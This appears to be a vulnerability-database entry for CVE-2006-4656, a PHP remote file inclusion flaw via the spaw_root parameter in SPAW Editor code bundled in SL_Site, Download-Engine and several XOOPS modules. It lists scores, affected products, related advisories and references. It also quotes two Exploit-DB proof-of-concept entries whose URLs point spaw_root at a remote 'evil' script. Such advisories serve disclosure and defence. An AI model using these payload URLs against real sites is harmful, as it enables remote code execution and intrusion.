CVE-2006-4656
Published: 2006-09-09
Priority: P3 43 | Severity: high | CVSS 2.0 base score: 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: public exploit indexed (see Exploit-DB entries below)
EPSS: 10.59% (95.2nd percentile)
PHP remote file inclusion vulnerability in admin/editeur/spaw_control.class.php in Web Provence SL_Site 1.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: CVE analysis suggests that this issue is actually in a third party product, SPAW Editor PHP Edition.
Affected (6 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alex | downloadengine | — | — |
| web-provence | sl_site | <= 1.0 | — |
| xoops | cjay_content_module | — | — |
| xoops | icontent_module | — | — |
| xoops | tinycontent_module | — | — |
| xoops | wiwimod_module | — | — |
GHSA-5h7c-ghqw-hhxv (CVE-2006-4656, HIGH; GHSA unreviewed, 2022-05-01): PHP remote file inclusion vulnerability in admin/editeur/spaw_control
PHP remote file inclusion vulnerability in admin/editeur/spaw_control.class.php in Web Provence SL_Site 1.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: CVE analysis suggests that this issue is actually in a third party product, SPAW Editor PHP Edition.
GHSA-2p7h-c2c4-7p56 (CVE-2007-3220, HIGH, CVSS 7.5; GHSA unreviewed, 2022-05-01): PHP remote file inclusion vulnerability in admin/editor2/spaw_control
PHP remote file inclusion vulnerability in admin/editor2/spaw_control.class.php in the Cjay Content 3 module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: this may be a duplicate of CVE-2006-4656.
GHSA-cg2v-qgrr-gw86 (CVE-2006-5291, HIGH, CWE-94, CVSS 7.5; GHSA unreviewed, 2022-05-01): PHP remote file inclusion vulnerability in admin/includes/spaw/spaw_control
PHP remote file inclusion vulnerability in admin/includes/spaw/spaw_control.class.php in Download-Engine 1.4.2 allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: CVE analysis suggests that this issue is actually in a third party product, SPAW Editor PHP Edition, so this issue is probably a duplicate of CVE-2006-4656.
GHSA-vwmx-6456-487h (CVE-2007-3237, HIGH, CVSS 7.5; GHSA unreviewed, 2022-05-01): PHP remote file inclusion vulnerability in admin/spaw/spaw_control
PHP remote file inclusion vulnerability in admin/spaw/spaw_control.class.php in the TinyContent 1.5 module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: this issue is probably a duplicate of CVE-2006-4656.
GHSA-46cj-j92w-jf4m (CVE-2007-3057, HIGH, CVSS 7.5; GHSA unreviewed, 2022-05-01): PHP remote file inclusion vulnerability in include/wysiwyg/spaw_control
PHP remote file inclusion vulnerability in include/wysiwyg/spaw_control.class.php in the icontent 4.5 module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: this issue is probably a duplicate of CVE-2006-4656.
GHSA-xrj9-vwwj-2w2c (CVE-2007-3221, HIGH, CVSS 7.5; GHSA unreviewed, 2022-05-01): PHP remote file inclusion vulnerability in admin/spaw/spaw_control
PHP remote file inclusion vulnerability in admin/spaw/spaw_control.class.php in the XT-Conteudo module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: this issue is probably a duplicate of CVE-2006-4656.
GHSA-vvqg-75f9-88hx (CVE-2007-3289, HIGH, CVSS 7.5; GHSA unreviewed, 2022-05-01): PHP remote file inclusion vulnerability in spaw/spaw_control
PHP remote file inclusion vulnerability in spaw/spaw_control.class.php in the WiwiMod 0.4 module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: this issue is probably a duplicate of CVE-2006-4656.
No detection rules found.
Exploit-DB: Download-Engine 1.4.2 - 'spaw' Remote File Inclusion (exploitdb, 2006-10-12, CVE-2006-5291)
---
#======================================================================================#
# Download-Engine Remote File Include #
#======================================================================================#
# Info:- #
# #
# Scripts: Download-Engine #
# Download: http://www.alexscriptengine.de/v2/dl_engine/redirect.php?dlid=50&ENGINEsessID=4754ee8243de5f333ec74272f249b649
# Version : 1.4.2 #
# Dork & vuln : download scripts and think :) #
# Note : only this version affected :) #
#======================================================================================#
#Exploit : #
# #
#http://localhost/path/admin/includes/spaw/spaw_control.class.php?spaw_root=http://EvElCoDe.txt?
# #
#========================================
Exploit-DB: SL_Site 1.0 - 'spaw_root' Remote File Inclusion (exploitdb, 2006-09-07, CVE-2006-5291)
---
SL_Site <= 1.0 [spaw_root] Remote File Include Vulnerability
Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :
Remote : Yes
Critical Level : Dangerous
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : SL_Site
version : 1.0
URL : ftp://ftp1.comscripts.com/PHP/2032_slsite-10.zip
Exploit:
~~~~~
Variable $spaw_root not sanitized. When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.
# http://site.com/[path]/admin/editeur/spaw_control.class.php?spaw_root=[Evil_Script]
Solution :
~~~~~~~
declare variable $spaw_root
Shoutz:
~~~
# Special greetz to my good friend [Oo]
# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ]
*/
No writeups or analysis indexed.
References:
http://securityreason.com/securityalert/1522
http://securitytracker.com/id?1016814
http://spaw.cvs.sourceforge.net/spaw/spaw/docs/ChangeLog.txt?view=markup
http://spaw.cvs.sourceforge.net/spaw/spaw/spaw_control.class.php?r1=1.19&r2=1.20
http://spaw.cvs.sourceforge.net/spaw/spaw/spaw_control.class.php?r1=1.25&r2=1.26
http://www.securityfocus.com/archive/1/445520/100/0/threaded
http://www.securityfocus.com/bid/19892
https://exchange.xforce.ibmcloud.com/vulnerabilities/28783
https://www.exploit-db.com/exploits/2317